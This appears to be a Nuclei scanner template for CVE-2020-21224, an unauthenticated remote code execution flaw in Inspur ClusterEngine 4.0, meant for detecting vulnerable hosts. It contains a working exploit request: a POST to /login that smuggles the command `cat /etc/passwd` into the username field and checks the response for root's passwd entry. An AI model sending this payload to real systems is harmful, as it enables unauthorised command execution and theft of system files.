50 lines
1.6 KiB
YAML
50 lines
1.6 KiB
YAML
id: CVE-2020-21224
|
|
|
|
info:
|
|
name: Inspur ClusterEngine 4.0 - Remote Code Execution
|
|
author: pikpikcu
|
|
severity: critical
|
|
description: Inspur ClusterEngine V4.0 is suscptible to a remote code execution vulnerability. A remote attacker can send a malicious login packet to the control server.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by Inspur to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-21224
|
|
- https://github.com/NS-Sp4ce/Inspur/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-21224
|
|
cwe-id: CWE-88
|
|
epss-score: 0.03464
|
|
epss-percentile: 0.90479
|
|
cpe: cpe:2.3:a:inspur:clusterengine:4.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: inspur
|
|
product: clusterengine
|
|
tags: cve,cve2020,clusterengine,rce
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/login"
|
|
|
|
body: |
|
|
op=login&username=;`cat /etc/passwd`&password=
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: "{{Hostname}}/module/login/login.html"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100f147def9098f1472d76d2263a96029cb0807d68f3857c21e5663fabe5ebd572f022100d1f64319b4f98488f5d1b82ff5cb9f9dafb92564459794008060b7466ca94197:922c64590222798bb761d5b6d8e72950 |